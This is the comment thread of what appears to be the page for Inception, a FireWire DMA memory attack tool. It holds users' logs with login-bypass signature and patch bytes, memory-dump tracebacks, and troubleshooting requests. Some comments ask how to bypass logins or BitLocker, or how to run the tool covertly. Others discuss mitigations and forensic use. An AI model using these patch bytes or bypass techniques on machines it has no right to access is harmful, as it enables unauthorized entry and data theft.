    [*] The target module contains the following signatures:
    Versions: 10.6.4, 10.6.8, 10.7.3, 10.8.2
    Architectures: x86, x64

    Offsets: 0x7cf
    Signature: 0x41bff6c8ffff48c78588
    Patch: 0x41bf0000000048c78588
    Patch offset: 0x0

    Offsets: 0xbff
    Signature: 0x41bff6c8ffff
    Patch: 0x41bf00000000
    Patch offset: 0x0

    Offsets: 0x82f
    Signature: 0xc78580f6fffff6c8ffff
    Patch: 0xc78580f6ffff00000000
    Patch offset: 0x0

    Offsets: 0xfa7
    Signature: 0xfb689d8eb0231c04883c4785b415c415d415e415f5dc3
    Patch: 0x31dbffc3
    Patch offset: 0x0

    Offsets: 0x334
    Signature: 0x88d84883c4685b415c415d415e415f5d
    Patch: 0xb001
    Patch offset: 0x0
    [|] Initializing bus and enabling SBP-2, please wait 1 seconds or press Ctrl+C
    [*] DMA shields should be down by now. Attacking…
    [==> ] 309 MiB ( 8%) {000075b2498934fc}
    [*] Signature found at 0x13573bff in page no. 79219
    [!] Um, something went wrong: forensic1394_read_device_v: Bad I/O request size
    Traceback (most recent call last):
    File “./incept”, line 200, in main
    address, page = screenlock.attack(targets)
    File “/opt/inception/inception/”, line 303, in attack
    success, backup = patch(device, address, chunks)
    File “/opt/inception/inception/”, line 133, in patch
    backup =, cfg.PAGESIZE)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 48, in newf
    return f(self, *args, **kwargs)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 158, in read
    self._readreq(list(zip(addrs, lens)), buf)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 134, in _readreq
    forensic1394_read_device_v(self, creq, len(creq))
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 61, in process_result
    raise IOError(err)
    IOError: forensic1394_read_device_v: Bad I/O request size
    [email protected]:/opt/inception#

  58. Jeroen

    Problem with pickpocket mode. Log:

    [email protected]:/opt/inception# ./incept -v --pickpocket

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: | Twitter: @breaknenter

    [!] Um, something went wrong: ‘module’ object has no attribute ‘wrapper’
    Traceback (most recent call last):
    File “./incept”, line 198, in main
    File “/opt/inception/inception/”, line 37, in lurk
    s = ‘\n’.join(term.wrapper.wrap(‘[-] Lurking in the shrubbery ‘ +
    AttributeError: ‘module’ object has no attribute ‘wrapper’

    Fix: change line 37 in to:

    s = '\n[-] Lurking in the shrubbery, waiting for a device to connect, Ctrl-C to abort\r'

  59. Jeroen

    Problem with reading ~3+ GiB of memory. Happens in all modes. Inception aborts, target system may or may not freeze. Same problem on both Apple hw (tested on 10.6, 10.7, 10.8) and Windows PC (tested on 7 x64). Attacker is Ubuntu 12.04.02 LTS x64. Problem happens with both integrated and ExpressCard interface. Log:

    [email protected]:/opt/inception# ./incept -v --pickpocket

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: | Twitter: @breaknenter

    [-] Lurking in the shrubbery, waiting for a device to connect, Ctrl-C to abort
    [*] FireWire device detected
    [*] Dumping from 0x100000 to 0x100000000, a total of 4095 MiB
    [*] FireWire devices on the bus (names may appear blank):
    [1] Vendor (ID): Apple Computer, Inc. (0xa27) | Product (ID): Macintosh (0xa)
    [*] Only one device present, device auto-selected as target
    [*] Selected device: Apple Computer, Inc.
    [-] Initializing bus and enabling SBP-2, please wait 1 seconds or press Ctrl+C
    [!] Um, something went wrong: forensic1394_read_device_v: I/O timeoutffffffffff}
    Traceback (most recent call last):
    File “./incept”, line 198, in main
    File “/opt/inception/inception/”, line 51, in lurk
    memdump.dump(start, end)
    File “/opt/inception/inception/”, line 81, in dump
    data =, requestsize)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 48, in newf
    return f(self, *args, **kwargs)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 158, in read
    self._readreq(list(zip(addrs, lens)), buf)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 134, in _readreq
    forensic1394_read_device_v(self, creq, len(creq))
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/”, line 61, in process_result
    raise IOError(err)
    IOError: forensic1394_read_device_v: I/O timeout
    [email protected]:/opt/inception#

    Any clues about how to debug this issue? Tx!

  60. Tommy

    Hardware embedded encryption of drive much faster than OS encryption and prevents DMA. Did you know that the NSA just finished building a humungous new super Q-bit data crypto-analysis computer complex and that it just went online last September 2012 (Wired magazine article “Inside the Matrix” April-2012 issue). Mr Control Freak just used your American tax dollars to fund the electric anal probe to rape the world with. Our privacy is now finally completely F**ked to H**l. The saddest part of this is that I don’t think they’re smart enough to realize that this same technology will someday be used against them also.

  61. Georgy

    I’ve ordered the relevant FireWire pci-e card. While I’m waiting for it to arrive, could you tell me:
    Will this work running inception in a Debian 7 VM?
    Or does it need to run from the host?

  62. Mr Schmeg

    Is FireWire broken in Ubuntu now? Having the same error on many machines: Ubuntu 12.04 LTS, Mint etc …
    [email protected]:~/inception$ sudo ./incept

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: | Twitter: @breaknenter

    [?] FireWire modules are not loaded (or insufficient privileges). Try loading
    them? [Y/n]:
    [!] Could not initialize FireWire. Are the modules loaded into the kernel?
    [!] Attack unsuccessful

  63. crackruckles

    Just got your tool installed on my Raspberry Pi and that went fine. I have it attached to a USB to FireWire cable but I get the error “firewire modules not loaded”. Any ideas?

  65. Watzmann

    Awesome tool. It worked for me on an Apple 10.8.4, attacking a Windows XP machine over 1394, with McAfee FW and encryption. Now I am able to recover my personal, private data. Will donate. Thank you very much.

  66. Sam

    Hi, looks really interesting

    Can this be used to set up a serial console on linux systems to capture kernel panic stack traces?

    I want to do this on a machine that’s panicking every couple of days – it has no RS232 at all.

  67. Pooper

    I’m a nice guy. This shit is making me suicidal. I don’t get you people. I’m literally going to just give up on people and end this shit... and I was on your side too.

  68. Rena

    You’re on Hacker News. Better late than never?

    What a nice protocol Firewire is to just give you direct access to physical memory. So kind of it.

  69. Kurt H Hanssen

    Hi Carsten
    Talk with you today about issues with Macbook Air and Macbook Pro from 2012 and newer.

    Have tested Inception against a whole bunch of MacBook Air/Pro machines, old ones and new. When I came to machines newer than mid 2012, it is not possible to read anything from the memory of the target machine. Have tried both the patching method and --pickpocket.

    As an attacker machine, I have tried both Ubuntu 12.10 installed on PC and Mac (not using virtualization).

    The newer MacBook Air/Pro only have Thunderbolt, but I’m using the original Apple Thunderbolt –> FireWire adapter.

    Have had success attacking a 2011 MacBook Air through Thunderbolt w/adapter but not two different MB Airs from 2012 and 2013 and an MB Pro from mid 2012.

    On all target machines, the juju firewire stack shows up, even on the newer MB Pro/Air, so I know the machine is recognized. They are also recognized by Inception as Apple computers.

    I think there must be some sort of shield on the newer MB Pro/Air.

    Have even tried to shadow the attacker machine behind a Thunderbolt disk, but with the same result:
    forensic1394_read_device_v: I/O Timeout

    Have also tried the forensic1394 libraries manually through Python3, and these machines are all identified and possible to attach to, but there is no reading. I think I had one success reading just a few kilobytes with some tweaking of start/length.

    • Carsten

      Hi Kurt. This is interesting. Would it be possible for me to get in touch with you to test this on your HW?

      Also – for anybody else reading this – are you experiencing the same issues?

      • Kurt H Hanssen

        Hi Carsten
        Yes, I’m in Oslo from mon 3. to thu 6. March
        I have the machines available for you and we could have a look at these issues. Just let me know. I send you a SMS


  70. Chris Taylor

    I think this tool is excellent and have been testing it as a method of conducting live computer forensics on a suspect’s machine. I think one way this could be improved would be to add a hashing feature in order to verify the integrity of the RAM image, therefore helping to make the image admissible as evidence.
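The hashing Chris Taylor suggests could look like the sketch below, which records an overall SHA-256 plus one digest per chunk so that a later mismatch can be localised. This is an added example and not part of Inception; the function names, the manifest layout and the constructed sample image are assumptions.

```python
import hashlib
import hmac
import io
from typing import BinaryIO, Dict, List

CHUNK = 1024 * 1024  # 1 MiB per manifest entry (assumed default)

# Constructed sample "memory image": 10240 bytes, so 2.5 chunks of 4096 bytes.
SAMPLE = bytes(range(256)) * 40


def _read_full(stream: BinaryIO, n: int) -> bytes:
    """Read exactly n bytes unless EOF comes first (raw streams may return less)."""
    parts: List[bytes] = []
    got = 0
    while got < n:
        block = stream.read(n - got)
        if not block:
            break
        parts.append(block)
        got += len(block)
    return b"".join(parts)


def build_manifest(image: BinaryIO, chunk_size: int = CHUNK) -> Dict:
    """Hash the image in one pass: a whole-file digest and a digest per chunk."""
    whole = hashlib.sha256()
    chunks: List[str] = []
    size = 0
    while True:
        block = _read_full(image, chunk_size)
        if not block:
            break
        whole.update(block)
        chunks.append(hashlib.sha256(block).hexdigest())
        size += len(block)
    return {"algorithm": "sha256", "chunk_size": chunk_size, "size": size,
            "digest": whole.hexdigest(), "chunks": chunks}


def verify(image: BinaryIO, manifest: Dict) -> Dict:
    """Re-hash the image and report which chunks differ from the manifest."""
    now = build_manifest(image, manifest["chunk_size"])
    old, new = manifest["chunks"], now["chunks"]
    changed = [i for i, (a, b) in enumerate(zip(old, new))
               if not hmac.compare_digest(a, b)]
    # Chunks that exist on only one side (image truncated or extended).
    changed += range(min(len(old), len(new)), max(len(old), len(new)))
    ok = (hmac.compare_digest(now["digest"], manifest["digest"])
          and now["size"] == manifest["size"])
    return {"ok": ok, "size_delta": now["size"] - manifest["size"],
            "changed_chunks": changed}


if __name__ == "__main__":
    manifest = build_manifest(io.BytesIO(SAMPLE), chunk_size=4096)
    tampered = bytearray(SAMPLE)
    tampered[5000] ^= 0xFF  # flip one byte inside chunk 1
    print(verify(io.BytesIO(SAMPLE), manifest))
    print(verify(io.BytesIO(bytes(tampered)), manifest))
```

The manifest has to be stored or signed separately from the image, otherwise both can be altered together. A matching hash shows the file is unchanged since acquisition; it does not turn a non-atomic FireWire read into a consistent snapshot.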


  71. jk

    I understand that a native or PCI FireWire port is needed at the target system, but is it necessarily needed at the host?
    And would a FireWire-USB adapter work if it was connected to a USB ExpressCard?
    (And I had to write trash into the website label since it didn’t want me to post a comment otherwise.)

  72. Heinz Kreft

    Hi Carsten,
    Your Inception tool is a great proof of concept of how difficult it would be to establish good protection for unsafe platforms, and is also an excellent demonstration of your personal capabilities …

    My reason for posting here is to put an idea on the table that I’ve had in my head for a long time; so far I have not found such a thing on the Internet. I would like to ask you and the people here what they think about it.

    I call this currently non-existent tool “ICT RipCord”. It should help to make PCs a little bit safer against DMA & Cold Boot Attacks in the following way:

    A small system service on the PC (e.g. Windows, OSX) and an app on a smartphone (iOS, Android) work together as a “dead man switch”. They establish a VPC using self-generated root certificates (created at install time, no dependence on any third party) with Perfect Forward Secrecy (OTP session keys established by the Diffie-Hellman protocol (DHP)). This channel is then used for a simple “ping-pong protocol” to make sure that everything is OK. If the PC protected in this way is not able to get a valid answer within a preset timeframe, the PC fails safe: the service stops the system, (optionally) zeros the RAM and forces the PC to go down (forgetting the effected memory keys).

    This can limit the timeframe for an attacker having physical control over the PC-Victim to capture the key in memory.

    If the owner of the authentication token (the smartphone with the auth app) detects that his PC has been stolen, is under attack or was even forgotten to be switched off, he simply turns off the authentication service. It is no big issue if this tool downs the PC when the network goes down, because the legal owner of the PC is in general able to enter the key of the previously installed full disk encryption system.

    I am interested to hear pros and cons about this.
    Thanks a lot,


  73. Andy

    Hey, this tool really is cool :-)
    I will use this tool to silence some of the loud-mouthed guys here claiming that encrypting a PC without activating PBA is enough security …

    Something I noticed: Using Ubuntu 12.4 LTS with all required stuff added to attack a McAfee EEPC-encrypted Win7-64 Enterprise system.

    Attack works fine for the first attempt (PBA is passed, Win7 boots up, user logs in the regular way, screen is locked), unlock the screen is possible w/o password.
    When in this same session the screen then is locked again using WIN-L, the next attack fails (at around 29xx MiB – system has 4GB) with some firewire I/O error.

    Any specific reason for that ?

    After the system has been rebooted and a user logs in the regular way, and then locks the screen, the attack works again. Not really an issue, as one would expect an attacker to NOT lock the screen :-)
    Only, assuming that the screen saver hits during e.g. copying the data off the attacked PC, it can’t be unlocked again, which can be annoying. (no, one can’t disable the screen saver, if the settings are done via GPO).


  74. Andy

    Hi Carsten,

    (somehow the sort order of this posts is screwed up ?! It’s not ordered by date …)

    to protect a PC, one needs to know what a potential attacker needs to know or have, so: As I understood this tool, to log on to the victim PC (assuming a Windows system to be attacked), always an existing and valid local user account is required ?!

    I tried the following (all on Win7-64 as victim, joined into an AD domain):
    – System booted and domain account logged in, screen locked, network connected: Works, can unlock w/o password.
    – Same system, screen locked again: Won’t work, Firewire I/O error !
    – System booted, but nobody logged on, using the last logged-on domain account, network connected: Nope, no way !
    Tool says OK, but can’t log on. Seems the code to verify a domain account is not patched.
    – System booted, nobody logged on, using the last logged-on domain account, NO network connected: Works, can log on w/o password.
    – Same system, user logged off, same user logged on again: Still works, can log on again, no need to re-run the tool.
    – System booted, nobody logged on, using arbitrary local account: No way, unknown user!

    That means: A potential attacker always needs to know a valid local computer account (or a valid domain account that has cached credentials) on the victim. If the local administrator is renamed (or disabled and/or no local user is known or does exist – any idea here ?), it is impossible to log on. If the last logged-on user is not displayed and no user is known – impossible to log on (after using Inception).

    To achieve this, windows can be set to not display the last logged-on, and the local accounts can be renamed or deleted/disabled.

    I therefore would say: If an attacker has no clue which account is valid to log on, there’s no way to get in ?!
    Anybody disagrees ? Did I miss anything ?

    Is there a way to locate a valid user account / cached credentials in the memory dump without knowing it before ?

    (Carsten, let me know if you want some more things tested …)


  81. Andrea


    I tested Inception on Windows 7 32 and 64 bit with SP0 and SP1 and it doesn’t work. :(

    Please, can you test this system?

    Thank you.

  82. Giovani

    Hi Carsten,

    first of all, thanks for your excellent tool! However I’ve got some trouble with my recently installed PCIe controller. The DMA attack works without any problems. But the memory analysis shows that the dumpfile is broken.

    Attacker: Ubu 12.04.3 native 1394
    Victim: Win7SP1x64 4GB RAM 1394 on PCIe_x1
    Tool: Volatility 2.3.1

    • Carsten

      DMA access over FireWire is not atomic unfortunately, so currently there’s no fix for this as volatility expects an atomic memory copy.

  83. ysminnpu

    Is it possible to detect the Windows version before the attack? This can save attacking time because we only need to search specific signatures for that Windows version.

  84. Andrea


    I tested the unlock password attack of Inception on Windows 7 32 and 64 bit with SP0 and SP1 and it doesn’t work. :(

    Please, can you test this system?

    Thank you.

  85. Anders Karlsson

    Inception v.0.3.5 no longer finds any signature after patching my Windows 7. Winver version is: 7601 SP1, version of msv1_0.dll is: 6.1.7601.22616
    It has worked before until recent patches. How do I find the new signature?

  86. lockedbits

    After some updates BitLocker doesn’t let me boot into Win8.1 anymore because “winload.efi” was modified and I am forced to enter the recovery key now… recovery key is saved in KeePass on the encrypted drive… is there any way to bypass that recovery key menu with Inception? The notebook has no FireWire so I have to put the HDD in another computer and buy a PCIe FW card – don’t know if this could work because of the TPM chip?

  87. Sir.Costy

    Can the Inception tool unlock and escalate privileges if you are already logged in (logon)? I mean after entering the user account? Or does it work only when the logon window is shown at the beginning?

  96. Curious User

    Hey Carsten,

    I haven’t tried your tool yet but am very curious on how to mitigate such an attack. Maybe you can help me with the following questions:

    1) From what I understand a DMA attack *always* needs driver support from the OS. So prohibiting the installation of SBP2 devices via Windows Group Policies should be enough to prevent an inception as well as reading encryption keys from memory? There is no way to access memory without the OS actively allowing it?

    2) As far as I know, since Windows 8.1 SBP2 device drivers are only installed if a user is interactively logged on to the system. So running the attack on a locked workstation will not succeed.

    3) Does this type of attack only apply to FireWire (i.e. SBP2) or would it theoretically be possible to develop a PCIe device that simply dumps memory contents to some external storage?

    4) Does Bitlocker detect the insertion of pcmcia or PCIe cards or the removal of RAM at boot time? A way to overcome the 4GB barrier could be to simply remove the additional RAM and thus force the OS to use the lower address space.

    Best regards,

  102. Sir.Costy

    CooL !!! Saw your plans about a FIREWIRE payload a few months ago and was waiting for this moment.
    Just hope you will not stop and add to Implant support for Windows XP also. Great work. Cheers….

  109. Vlad

    Do you need any “special”, “crossover” firewire cable or 4 Pin to 4 Pin Firewire DV iLink Male to Male IEEE 1394 is fine?
    Thanks a lot


  112. J4NUS

    “There are plenty of other (and better) ways to hack a machine that doesn’t pack encryption.”

    Well, nice to hear. Any Suggestions?

  116. maduranga

    My laptop BCD settings are changed and it is prompting me to enter the BitLocker key to proceed when booting up. I don’t have the key file and I can’t proceed with it.
    The laptop contains all my valuable data. Is it possible to use Inception to recover my keys? I am using Win7. Please help.

  133. paul

    I used a 4pin cable and it does not work:
    Error: Could not detect any FireWire devices connected to this system

    Could someone please post a link to a working FW cable? Both computers have a built-in 4-pin FW connector.

  146. paul

    I’m getting an error trying to install inception:
    Warning: setuptools not available, you will have to install manually
    Traceback (most recent call last):
    File “./”, line 32, in
    raise e
    File “./”, line 28, in
    from setuptools import setup, find_packages
    ImportError: No module named ‘setuptools’
    thanks for any help

  147. paul4tune

    OK, I solved the issue by downloading setuptools and dragging the folder inside the inception folder, then installing inception. My next question is: once I have completed a memory dump, how do I save the .bin file?

  160. bravoxy

    Hi guys!
    I have a Windows 8.1 64-bit OS with full disk encryption. It is not possible to log on to the computer. The only local admin password is forgotten. The tool successfully dumped the whole memory but was not able to find the signature for Win 8.1… Has anybody already made a signature for Win 8.1 64-bit? Thx. Is there any tool that can search for the BitLocker recovery key in the memory dump (for Win 8.1, 64-bit)? Thx

  161. attis

    Based on Bravoxy’s problem, I’ve made a direct DLL patch (W8.1 x64) with NOPs – lets you in with any password. Still need tests through the FireWire to find the proper addressing.

  162. John McCash

    This tool is really awesome. One thing I wish for, though, is the ability to run it from an inconspicuous mobile device of some kind. A 3rd generation iPod would be ideal, and I actually have one, but it appears that the most recent iPodLinux uses an older kernel than is supported by Inception. Do you know of any way to get Inception working on this platform (I did see what appeared to be some references on google to later kernels on this device, but no specific instructions) or else any other small mobile device that has a Firewire or other supported Inception interface?
    Thanks much

  163. John McCash

    One other possibility that occurs to me is that somebody could do a custom firmware for a wireless PC card of some kind that would allow inception to be run from any 802.1 enabled host against the system into which it is inserted. Know whether anyone might be working on anything like that? The same trick would, of course, work with other types of PC card.

  164. Carsten

    I don’t know if anybody is working on something like this. Running inception on an ipod would require you to get a newer kernel to run on it first, unfortunately.

  165. paul4tune

    How can I save the memory dump? Thought I’d reply to your post in the hope you can actually see it, as your last comment was in 2014.




